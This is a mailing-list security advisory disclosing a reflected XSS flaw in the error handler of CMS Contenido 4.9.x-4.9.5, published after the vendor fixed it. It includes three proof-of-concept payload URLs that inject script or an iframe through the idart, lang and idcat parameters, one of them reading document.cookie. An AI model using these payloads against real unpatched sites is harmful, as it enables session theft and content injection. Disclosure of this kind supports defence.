Full Disclosure mailing list archives

By Date By Thread Reflecting XSS Vulnerability in CMS Contenido 4.9.x-4.9.5 From: Steffen Rösemann <steffen.roesemann1986 () gmail com>

Date: Wed, 24 Dec 2014 00:02:26 +0100

Advisory: Reflecting XSS Vulnerability in CMS Contenido 4.9.x-4.9.5 Advisory ID: SROEADV-2014-03 Author: Steffen Rösemann Affected Software: CMS Contenido 4.9.x-4.9.5 (Release: 10th Dec 2014) Vendor URL: http://www.contenido.org/de/ Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description: ========================== The Content Management System Contenido 4.9.x to 4.9.5 has a reflecting XSS vulnerability in its error-handler function which displays parameters on the webpage when unexpected values are being transmitted by the client. This vulnerability occurs when feature advanced mod rewrite (AMR) is disabled, which rewrites urls for SEO purposes. ================== Technical Details: ================== If unexpected values are being transmitted via the parameters „idart“, „lang“ and/or „idcat“ to the PHP-Script http://{IP/HOSTNAME}/cms/front_content.php an error will be thrown which displays the passed value to the user on the webpage without sanitizing it. Payload-Examples: http:// {IP/HOSTNAME}/cms/front_content.php?idcat=41&lang=1<script>alert("XSS")</script> http://{IP/HOSTNAME}/cms/front_content.php?idcat=41<iframe src="some_remote_src" height="200" width="200" ></iframe> &lang=1 http:// {IP/HOSTNAME}/cms/front_content.php?idart=32<script>alert(document.cookie)</script> ========= Solution: ========= Update to the latest version ==================== Disclosure Timeline: ==================== 17-Dec-2014 – found the vulnerability 17-Dec-2014 - informed the developers 18-Dec-2014 - response by vendor 19-Dec-2014 – fix by vendor 24-Dec-2014 - release date of this security advisory 24-Dec-2014 - post on FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== http://www.contenido.org/de/ http://sroesemann.blogspot.de _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Reflecting XSS Vulnerability in CMS Contenido 4.9.x-4.9.5 Steffen Rösemann (Dec 23)